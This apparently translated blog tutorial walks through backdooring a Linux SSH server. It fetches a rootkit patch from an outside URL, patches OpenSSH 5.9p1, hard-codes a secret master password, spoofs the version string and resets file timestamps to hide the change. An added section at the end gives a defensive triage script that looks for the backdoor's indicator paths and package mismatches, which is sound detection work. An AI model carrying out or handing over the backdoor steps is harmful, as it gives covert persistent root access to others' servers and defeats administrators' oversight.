Linux Security: SSH Backdoor

I. Check the SSH version

    [root@redkey vmshare]# ssh -V
    OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010

II. Download the SSH source package
Source package:
http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
Backdoor patch:
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
III. Back up the existing ssh configuration file

    [root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}

IV. Build and install

    [root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz
    [root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
    [root@redkey vmshare]# cd openssh-5.9p1.patch/
    [root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1
    [root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1
    [root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff
    patching file auth.c
    patching file auth-pam.c
    patching file auth-passwd.c
    patching file canohost.c
    patching file includes.h
    patching file log.c
    patching file servconf.c
    patching file sshconnect2.c
    patching file sshlogin.c
    patching file version.h

Set the backdoor password to "redkey":

    [root@redkey openssh-5.9p1]# vim includes.h

    int secret_ok;
    FILE *f;
    #define ILOG "/tmp/ilog"
    #define OLOG "/tmp/olog"
    #define SECRETPW "redkey"
    #endif /* INCLUDES_H */

Change the version information (SSH_VERSION):

    /* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
    #define SSH_VERSION "OpenSSH_5.3p1"
    #define SSH_PORTABLE "p1"
    #define SSH_RELEASE SSH_VERSION SSH_PORTABLE

Build & install

    [root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
    [root@redkey openssh-5.9p1]# make
    [root@redkey openssh-5.9p1]# make install

V. Restore the timestamp of the sshd_config file

    [root@redkey ssh]# touch -r sshd_config.bak ssh_config

VI. Restart the service or reload the configuration

    [root@redkey ssh]# service sshd reload

VII. Common problems
1. Packages that need to be installed

    openssl openssl-devel pam-devel

2. Common build problems
Errors that may appear during the build:

    configure: error: *** zlib.h missing - please install first or check config.log
    # yum install zlib-devel
    configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***
    # yum install openssl openssl-devel
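
Seen from the defender's side, the build above leaves checkable traces: the ILOG/OLOG paths from includes.h are compiled into sshd, those files may exist on disk, and `make install` with `--prefix=/usr/` overwrites the packaged /usr/sbin/sshd, so RPM verification of that file fails. The triage script below is an added example, not part of the original article; its function names are hypothetical, and it assumes GNU grep and an RPM-based host like the one shown. The two paths are compile-time defaults that can be changed, so a clean string scan proves nothing on its own, while the package verification does not depend on them.

```bash
#!/usr/bin/env bash
# Added example (not from the article). Indicators: ILOG/OLOG defaults from includes.h.
INDICATOR_PATHS="/tmp/ilog /tmp/olog"

# 0 = binary embeds an indicator path, 1 = none found, 2 = unreadable.
binary_has_indicator() {
    local bin="$1" p
    [ -r "$bin" ] || return 2
    for p in $INDICATOR_PATHS; do
        # -a: scan binary as text, -F: fixed string, -q: status only
        if grep -aFq -- "$p" "$bin"; then return 0; fi
    done
    return 1
}

# Print indicator files found under an optional root (e.g. a mounted image).
find_indicator_files() {
    local root="${1:-}" p
    for p in $INDICATOR_PATHS; do
        if [ -e "${root}${p}" ]; then echo "${root}${p}"; fi
    done
}

# 0 = file differs from its packaged copy, 1 = matches, 2 = cannot check.
package_mismatch() {
    local bin="$1"
    command -v rpm >/dev/null 2>&1 || return 2
    rpm -qf "$bin" >/dev/null 2>&1 || return 2
    # rpm -Vf lists only files that fail verification; match the exact path.
    rpm -Vf "$bin" 2>/dev/null | awk -v f="$bin" '$NF == f { hit = 1 } END { exit !hit }'
}

# Run all three checks; the return status is the number of hits.
triage_sshd() {
    local bin="${1:-/usr/sbin/sshd}" root="${2:-}" hits=0 files
    if binary_has_indicator "$bin"; then
        echo "HIT: $bin embeds an ILOG/OLOG path"; hits=$((hits + 1))
    fi
    files=$(find_indicator_files "$root")
    if [ -n "$files" ]; then
        echo "HIT: indicator files present: $files"; hits=$((hits + 1))
    fi
    if package_mismatch "$bin"; then
        echo "HIT: $bin fails rpm verification"; hits=$((hits + 1))
    fi
    return "$hits"
}

# Stand-alone use: pass --run and optionally the sshd path.
if [ "${1:-}" = "--run" ]; then triage_sshd "${2:-/usr/sbin/sshd}"; fi
```
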

    Original author: 303Donatello
    Original URL: https://www.jianshu.com/p/b394528051c6